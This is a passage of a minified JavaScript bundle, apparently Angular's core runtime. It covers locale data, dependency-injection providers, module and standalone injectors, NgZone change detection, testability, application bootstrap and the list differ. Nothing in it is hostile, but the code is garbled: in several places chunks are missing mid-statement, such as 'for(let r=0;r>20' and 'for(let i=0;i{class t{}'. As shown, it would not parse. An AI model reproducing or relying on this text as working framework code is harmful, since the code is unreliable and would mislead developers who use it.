zzzz"],["{1}, {0}",J_,"{1} 'at' {0}",J_],[".",",",";","%","+","-","E","\xd7","\u2030","\u221e","NaN",":"],["#,##0.###","#,##0%","\xa4#,##0.00","#E0"],"USD","$","US Dollar",{},"ltr",function Jie(t){const e=Math.floor(Math.abs(t)),i=t.toString().replace(/^[^.]*\.?/,"").length;return 1===e&&0===i?1:5}];let c1={};function Xc(t){const a=function tae(t){return t.toLowerCase().replace(/_/g,"-")}(t);let e=sk(a);if(e)return e;const i=a.split("-")[0];if(e=sk(i),e)return e;if("en"===i)return Zie;throw new gi(701,!1)}function sk(t){return t in c1||(c1[t]=vo.ng&&vo.ng.common&&vo.ng.common.locales&&vo.ng.common.locales[t]),c1[t]}var Ji=(()=>((Ji=Ji||{})[Ji.LocaleId=0]="LocaleId",Ji[Ji.DayPeriodsFormat=1]="DayPeriodsFormat",Ji[Ji.DayPeriodsStandalone=2]="DayPeriodsStandalone",Ji[Ji.DaysFormat=3]="DaysFormat",Ji[Ji.DaysStandalone=4]="DaysStandalone",Ji[Ji.MonthsFormat=5]="MonthsFormat",Ji[Ji.MonthsStandalone=6]="MonthsStandalone",Ji[Ji.Eras=7]="Eras",Ji[Ji.FirstDayOfWeek=8]="FirstDayOfWeek",Ji[Ji.WeekendRange=9]="WeekendRange",Ji[Ji.DateFormat=10]="DateFormat",Ji[Ji.TimeFormat=11]="TimeFormat",Ji[Ji.DateTimeFormat=12]="DateTimeFormat",Ji[Ji.NumberSymbols=13]="NumberSymbols",Ji[Ji.NumberFormats=14]="NumberFormats",Ji[Ji.CurrencyCode=15]="CurrencyCode",Ji[Ji.CurrencySymbol=16]="CurrencySymbol",Ji[Ji.CurrencyName=17]="CurrencyName",Ji[Ji.Currencies=18]="Currencies",Ji[Ji.Directionality=19]="Directionality",Ji[Ji.PluralCase=20]="PluralCase",Ji[Ji.ExtraData=21]="ExtraData",Ji))();const l1="en-US";let ck=l1;function bD(t,a,e,i,n){if(t=La(t),Array.isArray(t))for(let r=0;r>20;if(je(t)||!t.multi){const pe=new dd(T,n,Ee),Re=vD(d,a,n?q:q+te,Y);-1===Re?(Km(ah(k,c),r,d),MD(r,t,a.length),a.push(d),k.directiveStart++,k.directiveEnd++,n&&(k.providerIndexes+=1048576),e.push(pe),c.push(pe)):(e[Re]=pe,c[Re]=pe)}else{const pe=vD(d,a,q+te,Y),Re=vD(d,a,q,q+te),Fe=pe>=0&&e[pe],Ne=Re>=0&&e[Re];if(n&&!Ne||!n&&!Fe){Km(ah(k,c),r,d);const et=function Jae(t,a,e,i,n){const r=new dd(t,e,Ee);return r.multi=[],r.index=a,r.componentProviders=0,Pk(r,n,i&&!e),r}(n?Yae:Xae,e.length,n,i,T);!n&&Ne&&(e[Re].providerFactory=et),MD(r,t,a.length,0),a.push(d),k.directiveStart++,k.directiveEnd++,n&&(k.providerIndexes+=1048576),e.push(et),c.push(et)}else MD(r,t,pe>-1?pe:Re,Pk(e[n?Re:pe],T,!n&&i));!n&&i&&Ne&&e[Re].componentProviders++}}}function MD(t,a,e,i){const n=je(a),r=function tt(t){return!!t.useClass}(a);if(n||r){const T=(r?La(a.useClass):a).prototype.ngOnDestroy;if(T){const k=t.destroyHooks||(t.destroyHooks=[]);if(!n&&a.multi){const q=k.indexOf(e);-1===q?k.push(e,[i,T]):k[q+1].push(i,T)}else k.push(e,T)}}}function Pk(t,a,e){return e&&t.componentProviders++,t.multi.push(a)-1}function vD(t,a,e,i){for(let n=e;n{e.providersResolver=(i,n)=>function Kae(t,a,e){const i=Rn();if(i.firstCreatePass){const n=gr(t);bD(e,i.data,i.blueprint,n,!0),bD(a,i.data,i.blueprint,n,!1)}}(i,n?n(t):t,a)}}class Z_{}class Ok{}class Nk extends Z_{constructor(a,e){super(),this._parent=e,this._bootstrapComponents=[],this.destroyCbs=[],this.componentFactoryResolver=new dD(this);const i=ds(a);this._bootstrapComponents=bh(i.bootstrap),this._r3Injector=wR(a,e,[{provide:Z_,useValue:this},{provide:On,useValue:this.componentFactoryResolver}],Wo(a),new Set(["environment"])),this._r3Injector.resolveInjectorInitializers(),this.instance=this._r3Injector.get(a)}get injector(){return this._r3Injector}destroy(){const a=this._r3Injector;!a.destroyed&&a.destroy(),this.destroyCbs.forEach(e=>e()),this.destroyCbs=null}onDestroy(a){this.destroyCbs.push(a)}}class TD extends Ok{constructor(a){super(),this.moduleType=a}create(a){return new Nk(this.moduleType,a)}}class ene extends Z_{constructor(a,e,i){super(),this.componentFactoryResolver=new dD(this),this.instance=null;const n=new ui([...a,{provide:Z_,useValue:this},{provide:On,useValue:this.componentFactoryResolver}],e||Lt(),i,new Set(["environment"]));this.injector=n,n.resolveInjectorInitializers()}destroy(){this.injector.destroy()}onDestroy(a){this.injector.onDestroy(a)}}function Sv(t,a,e=null){return new ene(t,a,e).injector}let tne=(()=>{class t{constructor(e){this._injector=e,this.cachedInjectors=new Map}getOrCreateStandaloneInjector(e){if(!e.standalone)return null;if(!this.cachedInjectors.has(e.id)){const i=cv(0,e.type),n=i.length>0?Sv([i],this._injector,`Standalone[${e.type.name}]`):null;this.cachedInjectors.set(e.id,n)}return this.cachedInjectors.get(e.id)}ngOnDestroy(){try{for(const e of this.cachedInjectors.values())null!==e&&e.destroy()}finally{this.cachedInjectors.clear()}}}return t.\u0275prov=hi({token:t,providedIn:"environment",factory:()=>new t(At(Ht))}),t})();function Lk(t){t.getStandaloneInjector=a=>a.get(tne).getOrCreateStandaloneInjector(t)}function kr(t,a,e){const i=fs()+t,n=bi();return n[i]===mn?au(n,i,e?a.call(e):a()):function UC(t,a){return t[a]}(n,i)}function fr(t,a,e,i){return Uk(bi(),fs(),t,a,e,i)}function Ah(t,a,e,i,n){return qk(bi(),fs(),t,a,e,i,n)}function JC(t,a){const e=t[a];return e===mn?void 0:e}function Uk(t,a,e,i,n,r){const c=a+e;return Mc(t,c,n)?au(t,c+1,r?i.call(r,n):i(n)):JC(t,c+1)}function qk(t,a,e,i,n,r,c){const d=a+e;return X_(t,d,n,r)?au(t,d+2,c?i.call(c,n,r):i(n,r)):JC(t,d+2)}function oe(t,a){const e=Rn();let i;const n=t+22;e.firstCreatePass?(i=function gne(t,a){if(a)for(let e=a.length-1;e>=0;e--){const i=a[e];if(t===i.name)return i}}(a,e.pipeRegistry),e.data[n]=i,i.onDestroy&&(e.destroyHooks||(e.destroyHooks=[])).push(n,i.onDestroy)):i=e.data[n];const r=i.factory||(i.factory=Qd(i.type)),c=Bs(Ee);try{const d=Lf(!1),T=r();return Lf(d),function hie(t,a,e,i){e>=t.data.length&&(t.data[e]=null,t.blueprint[e]=null),a[e]=i}(e,bi(),n,T),T}finally{Bs(c)}}function re(t,a,e){const i=t+22,n=bi(),r=Lc(n,i);return ZC(n,i)?Uk(n,fs(),a,r.transform,e,r):r.transform(e)}function ZC(t,a){return t[1].data[a].pure}function DD(t){return a=>{setTimeout(t,void 0,a)}}const Tt=class Mne extends J{constructor(a=!1){super(),this.__isAsync=a}emit(a){super.next(a)}subscribe(a,e,i){var n,r,c;let d=a,T=e||(()=>null),k=i;if(a&&"object"==typeof a){const Y=a;d=null===(n=Y.next)||void 0===n?void 0:n.bind(Y),T=null===(r=Y.error)||void 0===r?void 0:r.bind(Y),k=null===(c=Y.complete)||void 0===c?void 0:c.bind(Y)}this.__isAsync&&(T=DD(T),d&&(d=DD(d)),k&&(k=DD(k)));const q=super.subscribe({next:d,error:T,complete:k});return a instanceof I&&a.add(q),q}};function vne(){return this._results[K_()]()}class Cd{constructor(a=!1){this._emitDistinctChangesOnly=a,this.dirty=!0,this._results=[],this._changesDetected=!1,this._changes=null,this.length=0,this.first=void 0,this.last=void 0;const e=K_(),i=Cd.prototype;i[e]||(i[e]=vne)}get changes(){return this._changes||(this._changes=new Tt)}get(a){return this._results[a]}map(a){return this._results.map(a)}filter(a){return this._results.filter(a)}find(a){return this._results.find(a)}reduce(a,e){return this._results.reduce(a,e)}forEach(a){this._results.forEach(a)}some(a){return this._results.some(a)}toArray(){return this._results.slice()}toString(){return this._results.toString()}reset(a,e){const i=this;i.dirty=!1;const n=ac(a);(this._changesDetected=!function yC(t,a,e){if(t.length!==a.length)return!1;for(let i=0;i{class t{}return t.__NG_ELEMENT_ID__=Ene,t})();const Ane=ho,Tne=class extends Ane{constructor(a,e,i){super(),this._declarationLView=a,this._declarationTContainer=e,this.elementRef=i}createEmbeddedView(a,e){const i=this._declarationTContainer.tViews,n=gv(this._declarationLView,i,a,16,null,i.declTNode,null,null,null,null,e||null);n[17]=this._declarationLView[this._declarationTContainer.index];const c=this._declarationLView[19];return null!==c&&(n[19]=c.createEmbeddedView(i)),eD(i,n,a),new VC(n)}};function Ene(){return kv(or(),bi())}function kv(t,a){return 4&t.type?new Tne(a,t,jc(t,a)):null}let fo=(()=>{class t{}return t.__NG_ELEMENT_ID__=Dne,t})();function Dne(){return Yk(or(),bi())}const xne=fo,Kk=class extends xne{constructor(a,e,i){super(),this._lContainer=a,this._hostTNode=e,this._hostLView=i}get element(){return jc(this._hostTNode,this._hostLView)}get injector(){return new Ym(this._hostTNode,this._hostLView)}get parentInjector(){const a=Jd(this._hostTNode,this._hostLView);if(x0(a)){const e=Qm(a,this._hostLView),i=md(a);return new Ym(e[1].data[i+8],e)}return new Ym(null,this._hostLView)}clear(){for(;this.length>0;)this.remove(this.length-1)}get(a){const e=Xk(this._lContainer);return null!==e&&e[a]||null}get length(){return this._lContainer.length-10}createEmbeddedView(a,e,i){let n,r;"number"==typeof i?n=i:null!=i&&(n=i.index,r=i.injector);const c=a.createEmbeddedView(e||{},r);return this.insert(c,n),c}createComponent(a,e,i,n,r){const c=a&&!function oh(t){return"function"==typeof t}(a);let d;if(c)d=e;else{const Y=e||{};d=Y.index,i=Y.injector,n=Y.projectableNodes,r=Y.environmentInjector||Y.ngModuleRef}const T=c?a:new BC(Un(a)),k=i||this.parentInjector;if(!r&&null==T.ngModule){const te=(c?k:this.parentInjector).get(Ht,null);te&&(r=te)}const q=T.create(k,n,void 0,r);return this.insert(q.hostView,d),q}insert(a,e){const i=a._lView,n=i[1];if(function eC(t){return Is(t[3])}(i)){const q=this.indexOf(a);if(-1!==q)this.detach(q);else{const Y=i[3],te=new Kk(Y,Y[6],Y[3]);te.detach(te.indexOf(a))}}const r=this._adjustIndex(e),c=this._lContainer;!function Ree(t,a,e,i){const n=10+i,r=e.length;i>0&&(e[n-1][4]=a),i0)i.push(c[d/2]);else{const k=r[d+1],q=a[-T];for(let Y=10;Y{class t{constructor(e){this.appInits=e,this.resolve=Ov,this.reject=Ov,this.initialized=!1,this.done=!1,this.donePromise=new Promise((i,n)=>{this.resolve=i,this.reject=n})}runInitializers(){if(this.initialized)return;const e=[],i=()=>{this.done=!0,this.resolve()};if(this.appInits)for(let n=0;n{r.subscribe({complete:d,error:T})});e.push(c)}}Promise.all(e).then(()=>{i()}).catch(n=>{this.reject(n)}),0===e.length&&i(),this.initialized=!0}}return t.\u0275fac=function(e){return new(e||t)(At(Nv,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const h1=new ni("AppId",{providedIn:"root",factory:function v9(){return`${zD()}${zD()}${zD()}`}});function zD(){return String.fromCharCode(97+Math.floor(25*Math.random()))}const A9=new ni("Platform Initializer"),lm=new ni("Platform ID",{providedIn:"platform",factory:()=>"unknown"}),T9=new ni("appBootstrapListener"),ar=new ni("AnimationModuleType");let toe=(()=>{class t{log(e){console.log(e)}warn(e){console.warn(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})();const dm=new ni("LocaleId",{providedIn:"root",factory:()=>Po(dm,Da.Optional|Da.SkipSelf)||function ioe(){return"undefined"!=typeof $localize&&$localize.locale||l1}()});class noe{constructor(a,e){this.ngModuleFactory=a,this.componentFactories=e}}let WD=(()=>{class t{compileModuleSync(e){return new TD(e)}compileModuleAsync(e){return Promise.resolve(this.compileModuleSync(e))}compileModuleAndAllComponentsSync(e){const i=this.compileModuleSync(e),r=bh(ds(e).declarations).reduce((c,d)=>{const T=Un(d);return T&&c.push(new BC(T)),c},[]);return new noe(i,r)}compileModuleAndAllComponentsAsync(e){return Promise.resolve(this.compileModuleAndAllComponentsSync(e))}clearCache(){}clearCacheFor(e){}getModuleId(e){}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const soe=(()=>Promise.resolve(0))();function FD(t){"undefined"==typeof Zone?soe.then(()=>{t&&t.apply(null,null)}):Zone.current.scheduleMicroTask("scheduleMicrotask",t)}class qi{constructor({enableLongStackTrace:a=!1,shouldCoalesceEventChangeDetection:e=!1,shouldCoalesceRunChangeDetection:i=!1}){if(this.hasPendingMacrotasks=!1,this.hasPendingMicrotasks=!1,this.isStable=!0,this.onUnstable=new Tt(!1),this.onMicrotaskEmpty=new Tt(!1),this.onStable=new Tt(!1),this.onError=new Tt(!1),"undefined"==typeof Zone)throw new gi(908,!1);Zone.assertZonePatched();const n=this;if(n._nesting=0,n._outer=n._inner=Zone.current,Zone.AsyncStackTaggingZoneSpec){const r=Zone.AsyncStackTaggingZoneSpec;n._inner=n._inner.fork(new r("Angular"))}Zone.TaskTrackingZoneSpec&&(n._inner=n._inner.fork(new Zone.TaskTrackingZoneSpec)),a&&Zone.longStackTraceZoneSpec&&(n._inner=n._inner.fork(Zone.longStackTraceZoneSpec)),n.shouldCoalesceEventChangeDetection=!i&&e,n.shouldCoalesceRunChangeDetection=i,n.lastRequestAnimationFrameId=-1,n.nativeRequestAnimationFrame=function coe(){let t=vo.requestAnimationFrame,a=vo.cancelAnimationFrame;if("undefined"!=typeof Zone&&t&&a){const e=t[Zone.__symbol__("OriginalDelegate")];e&&(t=e);const i=a[Zone.__symbol__("OriginalDelegate")];i&&(a=i)}return{nativeRequestAnimationFrame:t,nativeCancelAnimationFrame:a}}().nativeRequestAnimationFrame,function moe(t){const a=()=>{!function doe(t){t.isCheckStableRunning||-1!==t.lastRequestAnimationFrameId||(t.lastRequestAnimationFrameId=t.nativeRequestAnimationFrame.call(vo,()=>{t.fakeTopEventTask||(t.fakeTopEventTask=Zone.root.scheduleEventTask("fakeTopEventTask",()=>{t.lastRequestAnimationFrameId=-1,BD(t),t.isCheckStableRunning=!0,VD(t),t.isCheckStableRunning=!1},void 0,()=>{},()=>{})),t.fakeTopEventTask.invoke()}),BD(t))}(t)};t._inner=t._inner.fork({name:"angular",properties:{isAngularZone:!0},onInvokeTask:(e,i,n,r,c,d)=>{try{return x9(t),e.invokeTask(n,r,c,d)}finally{(t.shouldCoalesceEventChangeDetection&&"eventTask"===r.type||t.shouldCoalesceRunChangeDetection)&&a(),w9(t)}},onInvoke:(e,i,n,r,c,d,T)=>{try{return x9(t),e.invoke(n,r,c,d,T)}finally{t.shouldCoalesceRunChangeDetection&&a(),w9(t)}},onHasTask:(e,i,n,r)=>{e.hasTask(n,r),i===n&&("microTask"==r.change?(t._hasPendingMicrotasks=r.microTask,BD(t),VD(t)):"macroTask"==r.change&&(t.hasPendingMacrotasks=r.macroTask))},onHandleError:(e,i,n,r)=>(e.handleError(n,r),t.runOutsideAngular(()=>t.onError.emit(r)),!1)})}(n)}static isInAngularZone(){return"undefined"!=typeof Zone&&!0===Zone.current.get("isAngularZone")}static assertInAngularZone(){if(!qi.isInAngularZone())throw new gi(909,!1)}static assertNotInAngularZone(){if(qi.isInAngularZone())throw new gi(909,!1)}run(a,e,i){return this._inner.run(a,e,i)}runTask(a,e,i,n){const r=this._inner,c=r.scheduleEventTask("NgZoneEvent: "+n,a,loe,Ov,Ov);try{return r.runTask(c,e,i)}finally{r.cancelTask(c)}}runGuarded(a,e,i){return this._inner.runGuarded(a,e,i)}runOutsideAngular(a){return this._outer.run(a)}}const loe={};function VD(t){if(0==t._nesting&&!t.hasPendingMicrotasks&&!t.isStable)try{t._nesting++,t.onMicrotaskEmpty.emit(null)}finally{if(t._nesting--,!t.hasPendingMicrotasks)try{t.runOutsideAngular(()=>t.onStable.emit(null))}finally{t.isStable=!0}}}function BD(t){t.hasPendingMicrotasks=!!(t._hasPendingMicrotasks||(t.shouldCoalesceEventChangeDetection||t.shouldCoalesceRunChangeDetection)&&-1!==t.lastRequestAnimationFrameId)}function x9(t){t._nesting++,t.isStable&&(t.isStable=!1,t.onUnstable.emit(null))}function w9(t){t._nesting--,VD(t)}class uoe{constructor(){this.hasPendingMicrotasks=!1,this.hasPendingMacrotasks=!1,this.isStable=!0,this.onUnstable=new Tt,this.onMicrotaskEmpty=new Tt,this.onStable=new Tt,this.onError=new Tt}run(a,e,i){return a.apply(e,i)}runGuarded(a,e,i){return a.apply(e,i)}runOutsideAngular(a){return a()}runTask(a,e,i,n){return a.apply(e,i)}}const I9=new ni(""),zv=new ni("");let ty,HD=(()=>{class t{constructor(e,i,n){this._ngZone=e,this.registry=i,this._pendingCount=0,this._isZoneStable=!0,this._didWork=!1,this._callbacks=[],this.taskTrackingZone=null,ty||(function hoe(t){ty=t}(n),n.addToWindow(i)),this._watchAngularEvents(),e.run(()=>{this.taskTrackingZone="undefined"==typeof Zone?null:Zone.current.get("TaskTrackingZone")})}_watchAngularEvents(){this._ngZone.onUnstable.subscribe({next:()=>{this._didWork=!0,this._isZoneStable=!1}}),this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.subscribe({next:()=>{qi.assertNotInAngularZone(),FD(()=>{this._isZoneStable=!0,this._runCallbacksIfReady()})}})})}increasePendingRequestCount(){return this._pendingCount+=1,this._didWork=!0,this._pendingCount}decreasePendingRequestCount(){if(this._pendingCount-=1,this._pendingCount<0)throw new Error("pending async requests below zero");return this._runCallbacksIfReady(),this._pendingCount}isStable(){return this._isZoneStable&&0===this._pendingCount&&!this._ngZone.hasPendingMacrotasks}_runCallbacksIfReady(){if(this.isStable())FD(()=>{for(;0!==this._callbacks.length;){let e=this._callbacks.pop();clearTimeout(e.timeoutId),e.doneCb(this._didWork)}this._didWork=!1});else{let e=this.getPendingTasks();this._callbacks=this._callbacks.filter(i=>!i.updateCb||!i.updateCb(e)||(clearTimeout(i.timeoutId),!1)),this._didWork=!0}}getPendingTasks(){return this.taskTrackingZone?this.taskTrackingZone.macroTasks.map(e=>({source:e.source,creationLocation:e.creationLocation,data:e.data})):[]}addCallback(e,i,n){let r=-1;i&&i>0&&(r=setTimeout(()=>{this._callbacks=this._callbacks.filter(c=>c.timeoutId!==r),e(this._didWork,this.getPendingTasks())},i)),this._callbacks.push({doneCb:e,timeoutId:r,updateCb:n})}whenStable(e,i,n){if(n&&!this.taskTrackingZone)throw new Error('Task tracking zone is required when passing an update callback to whenStable(). Is "zone.js/plugins/task-tracking" loaded?');this.addCallback(e,i,n),this._runCallbacksIfReady()}getPendingRequestCount(){return this._pendingCount}registerApplication(e){this.registry.registerApplication(e,this)}unregisterApplication(e){this.registry.unregisterApplication(e)}findProviders(e,i,n){return[]}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(UD),At(zv))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),UD=(()=>{class t{constructor(){this._applications=new Map}registerApplication(e,i){this._applications.set(e,i)}unregisterApplication(e){this._applications.delete(e)}unregisterAllApplications(){this._applications.clear()}getTestability(e){return this._applications.get(e)||null}getAllTestabilities(){return Array.from(this._applications.values())}getAllRootElements(){return Array.from(this._applications.keys())}findTestabilityInTree(e,i=!0){var n;return null!==(n=null==ty?void 0:ty.findTestabilityInTree(this,e,i))&&void 0!==n?n:null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})(),ru=null;const R9=new ni("AllowMultipleToken"),qD=new ni("PlatformDestroyListeners");class S9{constructor(a,e){this.name=a,this.token=e}}function P9(t,a,e=[]){const i=`Platform: ${a}`,n=new ni(i);return(r=[])=>{let c=GD();if(!c||c.injector.get(R9,!1)){const d=[...e,...r,{provide:n,useValue:!0}];t?t(d):function _oe(t){if(ru&&!ru.get(R9,!1))throw new gi(400,!1);ru=t;const a=t.get(N9);(function k9(t){const a=t.get(A9,null);a&&a.forEach(e=>e())})(t)}(function O9(t=[],a){return Ko.create({name:a,providers:[{provide:dt,useValue:"platform"},{provide:qD,useValue:new Set([()=>ru=null])},...t]})}(d,i))}return function Coe(t){const a=GD();if(!a)throw new gi(401,!1);return a}()}}function GD(){var t;return null!==(t=null==ru?void 0:ru.get(N9))&&void 0!==t?t:null}let N9=(()=>{class t{constructor(e){this._injector=e,this._modules=[],this._destroyListeners=[],this._destroyed=!1}bootstrapModuleFactory(e,i){const n=function z9(t,a){let e;return e="noop"===t?new uoe:("zone.js"===t?void 0:t)||new qi(a),e}(null==i?void 0:i.ngZone,function L9(t){return{enableLongStackTrace:!1,shouldCoalesceEventChangeDetection:!(!t||!t.ngZoneEventCoalescing)||!1,shouldCoalesceRunChangeDetection:!(!t||!t.ngZoneRunCoalescing)||!1}}(i)),r=[{provide:qi,useValue:n}];return n.run(()=>{const c=Ko.create({providers:r,parent:this.injector,name:e.moduleType.name}),d=e.create(c),T=d.injector.get(yh,null);if(!T)throw new gi(402,!1);return n.runOutsideAngular(()=>{const k=n.onError.subscribe({next:q=>{T.handleError(q)}});d.onDestroy(()=>{Wv(this._modules,d),k.unsubscribe()})}),function W9(t,a,e){try{const i=e();return qC(i)?i.catch(n=>{throw a.runOutsideAngular(()=>t.handleError(n)),n}):i}catch(i){throw a.runOutsideAngular(()=>t.handleError(i)),i}}(T,n,()=>{const k=d.injector.get(Lv);return k.runInitializers(),k.donePromise.then(()=>(function lk(t){mr(t,"Expected localeId to be defined"),"string"==typeof t&&(ck=t.toLowerCase().replace(/_/g,"-"))}(d.injector.get(dm,l1)||l1),this._moduleDoBootstrap(d),d))})})}bootstrapModule(e,i=[]){const n=F9({},i);return function foe(t,a,e){const i=new TD(e);return Promise.resolve(i)}(0,0,e).then(r=>this.bootstrapModuleFactory(r,n))}_moduleDoBootstrap(e){const i=e.injector.get(Yf);if(e._bootstrapComponents.length>0)e._bootstrapComponents.forEach(n=>i.bootstrap(n));else{if(!e.instance.ngDoBootstrap)throw new gi(403,!1);e.instance.ngDoBootstrap(i)}this._modules.push(e)}onDestroy(e){this._destroyListeners.push(e)}get injector(){return this._injector}destroy(){if(this._destroyed)throw new gi(404,!1);this._modules.slice().forEach(i=>i.destroy()),this._destroyListeners.forEach(i=>i());const e=this._injector.get(qD,null);e&&(e.forEach(i=>i()),e.clear()),this._destroyed=!0}get destroyed(){return this._destroyed}}return t.\u0275fac=function(e){return new(e||t)(At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})();function F9(t,a){return Array.isArray(a)?a.reduce(F9,t):Object.assign(Object.assign({},t),a)}let Yf=(()=>{class t{constructor(e,i,n){this._zone=e,this._injector=i,this._exceptionHandler=n,this._bootstrapListeners=[],this._views=[],this._runningTick=!1,this._stable=!0,this._destroyed=!1,this._destroyListeners=[],this.componentTypes=[],this.components=[],this._onMicrotaskEmptySubscription=this._zone.onMicrotaskEmpty.subscribe({next:()=>{this._zone.run(()=>{this.tick()})}});const r=new G(d=>{this._stable=this._zone.isStable&&!this._zone.hasPendingMacrotasks&&!this._zone.hasPendingMicrotasks,this._zone.runOutsideAngular(()=>{d.next(this._stable),d.complete()})}),c=new G(d=>{let T;this._zone.runOutsideAngular(()=>{T=this._zone.onStable.subscribe(()=>{qi.assertNotInAngularZone(),FD(()=>{!this._stable&&!this._zone.hasPendingMacrotasks&&!this._zone.hasPendingMicrotasks&&(this._stable=!0,d.next(!0))})})});const k=this._zone.onUnstable.subscribe(()=>{qi.assertInAngularZone(),this._stable&&(this._stable=!1,this._zone.runOutsideAngular(()=>{d.next(!1)}))});return()=>{T.unsubscribe(),k.unsubscribe()}});this.isStable=ra(r,c.pipe(Bd()))}get destroyed(){return this._destroyed}get injector(){return this._injector}bootstrap(e,i){const n=e instanceof Yn;if(!this._injector.get(Lv).done)throw!n&&function zl(t){const a=Un(t)||ur(t)||tn(t);return null!==a&&a.standalone}(e),new gi(405,false);let c;c=n?e:this._injector.get(On).resolveComponentFactory(e),this.componentTypes.push(c.componentType);const d=function poe(t){return t.isBoundToModule}(c)?void 0:this._injector.get(Z_),k=c.create(Ko.NULL,[],i||c.selector,d),q=k.location.nativeElement,Y=k.injector.get(I9,null);return null==Y||Y.registerApplication(q),k.onDestroy(()=>{this.detachView(k.hostView),Wv(this.components,k),null==Y||Y.unregisterApplication(q)}),this._loadComponent(k),k}tick(){if(this._runningTick)throw new gi(101,!1);try{this._runningTick=!0;for(let e of this._views)e.detectChanges()}catch(e){this._zone.runOutsideAngular(()=>this._exceptionHandler.handleError(e))}finally{this._runningTick=!1}}attachView(e){const i=e;this._views.push(i),i.attachToAppRef(this)}detachView(e){const i=e;Wv(this._views,i),i.detachFromAppRef()}_loadComponent(e){this.attachView(e.hostView),this.tick(),this.components.push(e),this._injector.get(T9,[]).concat(this._bootstrapListeners).forEach(n=>n(e))}ngOnDestroy(){if(!this._destroyed)try{this._destroyListeners.forEach(e=>e()),this._views.slice().forEach(e=>e.destroy()),this._onMicrotaskEmptySubscription.unsubscribe()}finally{this._destroyed=!0,this._views=[],this._bootstrapListeners=[],this._destroyListeners=[]}}onDestroy(e){return this._destroyListeners.push(e),()=>Wv(this._destroyListeners,e)}destroy(){if(this._destroyed)throw new gi(406,!1);const e=this._injector;e.destroy&&!e.destroyed&&e.destroy()}get viewCount(){return this._views.length}warnIfDestroyed(){}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(Ht),At(yh))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Wv(t,a){const e=t.indexOf(a);e>-1&&t.splice(e,1)}let B9=!0,Ma=(()=>{class t{}return t.__NG_ELEMENT_ID__=Moe,t})();function Moe(t){return function voe(t,a,e){if(dl(t)&&!e){const i=hs(t.index,a);return new VC(i,i)}return 47&t.type?new VC(a[16],a):null}(or(),bi(),16==(16&t))}class j9{constructor(){}supports(a){return HC(a)}create(a){return new woe(a)}}const xoe=(t,a)=>a;class woe{constructor(a){this.length=0,this._linkedRecords=null,this._unlinkedRecords=null,this._previousItHead=null,this._itHead=null,this._itTail=null,this._additionsHead=null,this._additionsTail=null,this._movesHead=null,this._movesTail=null,this._removalsHead=null,this._removalsTail=null,this._identityChangesHead=null,this._identityChangesTail=null,this._trackByFn=a||xoe}forEachItem(a){let e;for(e=this._itHead;null!==e;e=e._next)a(e)}forEachOperation(a){let e=this._itHead,i=this._removalsHead,n=0,r=null;for(;e||i;){const c=!i||e&&e.currentIndex<$9(i,n,r)?e:i,d=$9(c,n,r),T=c.currentIndex;if(c===i)n--,i=i._nextRemoved;else if(e=e._next,null==c.previousIndex)n++;else{r||(r=[]);const k=d-n,q=T-n;if(k!=q){for(let te=0;te{c=this._trackByFn(n,d),null!==e&&Object.is(e.trackById,c)?(i&&(e=this._verifyReinsertion(e,d,c,n)),Object.is(e.item,d)||this._addIdentityChange(e,d)):(e=this._mismatch(e,d,c,n),i=!0),e=e._next,n++}),this.length=n;return this._truncate(e),this.collection=a,this.isDirty}get isDirty(){return null!==this._additionsHead||null!==this._movesHead||null!==this._removalsHead||null!==this._identityChangesHead}_reset(){if(this.isDirty){let a;for(a=this._previousItHead=this._itHead;null!==a;a=a._next)a._nextPrevious=a._next;for(a=this._additionsHead;null!==a;a=a._nextAdded)a.previousIndex=a.currentIndex;for(this._additionsHead=this._additionsTail=null,a=this._movesHead;null!==a;a=a._nextMoved)a.previousIndex=a.currentIndex;this._movesHead=this._movesTail=null,this._removalsHead=this._removalsTail=null,this._identityChangesHead=this._identityChangesTail=null}}_mismatch(a,e,i,n){let r;return null===a?r=this._itTail:(r=a._prev,this._remove(a)),null!==(a=null===this._unlinkedRecords?null:this._unlinkedRecords.get(i,null))?(Object.is(a.item,e)||this._addIdentityChange(a,e),this._reinsertAfter(a,r,n)):null!==(a=null===this._linkedRecords?null:this._linkedRecords.get(i,n))?(Object.is(a.item,e)||this._addIdentityChange(a,e),this._moveAfter(a,r,n)):a=this._addAfter(new Ioe(e,i),r,n),a}_verifyReinsertion(a,e,i,n){let r=null===this._unlinkedRecords?null:this._unlinkedRecords.get(i,null);return null!==r?a=this._reinsertAfter(r,a._prev,n):a.currentIndex!=n&&(a.currentIndex=n,this._addToMoves(a,n)),a}_truncate(a){for(;null!==a;){const e=a._next;this._addToRemovals(this._unlink(a)),a=e}null!==this._unlinkedRecords&&this._unlinkedRecords.clear(),null!==this._additionsTail&&(this._additionsTail._nextAdded=null),null!==this._movesTail&&(this._movesTail._nextMoved=null),null!==this._itTail&&(this._itTail._next=null),null!==this._removalsTail&&(this._removalsTail._nextRemoved=null),null!==this._identityChangesTail&&(this._identityChangesTail._nextIdentityChange=null)}_reinsertAfter(a,e,i){null!==this._unlinkedRecords&&this._unlinkedRecords.remove(a);const n=a._prevRemoved,r=a._nextRemoved;return null===n?this._removalsHead=r:n._nextRemoved=r,null===r?this._removalsTail=n:r._prevRemoved=n,this._insertAfter(a,e,i),this._addToMoves(a,i),a}_moveAfter(a,e,i){return this._unlink(a),this._insertAfter(a,e,i),this._addToMoves(a,i),a}_addAfter(a,e,i){return this._insertAfter(a,e,i),this._additionsTail=null===this._additionsTail?this._additionsHead=a:this._additionsTail._nextAdded=a,a}_insertAfter(a,e,i){const n=null===e?this._itHead:e._next;return a._next=n,a._prev=e,null===n?this._itTail=a:n._prev=a,null===e?this._itHead=a:e._next=a,null===this._linkedRecords&&(this._linkedRecords=new Q9),this._linkedRecords.put(a),a.currentIndex=i,a}_remove(a){return 